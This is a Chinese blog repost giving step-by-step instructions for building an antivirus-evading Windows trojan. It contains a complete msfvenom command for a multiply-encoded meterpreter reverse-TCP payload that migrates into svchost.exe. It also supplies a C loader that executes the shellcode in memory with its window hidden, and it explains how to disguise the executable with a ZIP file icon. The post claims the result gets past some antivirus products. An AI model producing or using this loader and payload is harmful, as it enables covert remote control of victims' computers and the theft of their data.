MSF编码+VS编译木马免杀
Posted 向阳-Y.
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MSF编码+VS编译木马免杀相关的知识,希望对你有一定的参考价值。
MSF编码+VS编译木马免杀
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e x86/shikata_ga_nai -i 15 -b '\\x00\\' PrependMigrate=true PrependMIgrateProx=svchost.exe -f c > /root/Desktop/shellcode.c
1.-e x86/shikata_ga_nai -i 15是用 -e x86/shikata_ga_hai编码15次
2.PrependMigrate=true PrependMIgrateProx=svchost.exe是使这个程序会默认迁移到svchost.exe进程(这是微软自带的一个进程)
3.还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力。(需要设置RC4PASSWORD=)
执行上面代码后,桌面会有一个shellcode.c文件
将其移到 windows,用记事本打开会有 :unsigned char buf[] =”一长串数字”
接着我们用vs2022去开始编译木马
在visual studio下新建一个c++的win32项目将以下代码模板复制进去,在把你得到的shellcode那长串数字复制到shellcode的位置。
#include<stdio.h>
#include<windows.h>
#pragma comment(linker,"/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"") //去除窗口
unsigned char shellcode[]= (这里就是shellcode)
void main()
LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, shellcode, sizeof(shellcode));
((void(*)())Memory)();
编译方法网上有很多种,这个时候已经可以编译了,但是我们还可以对图标进行更改伪装:右击你的项目—>添加—>资源—>图标—>新建,再用电脑的搜索查找*.ico,找到 ZIP的图标找到你这个项目的文件夹下会有一个zip.ico文件,将zip.ico替换成icon1.ico,再次编译
再次编译的结果:
测试了一下效果,火绒是真的强,刚生成就被杀。电脑管家发现不了,所以确实能绕过一部分WAF
原文连接:
https://www.freebuf.com/sectool/166682.html?replytocom=247112
以上是关于MSF编码+VS编译木马免杀的主要内容,如果未能解决你的问题,请参考以下文章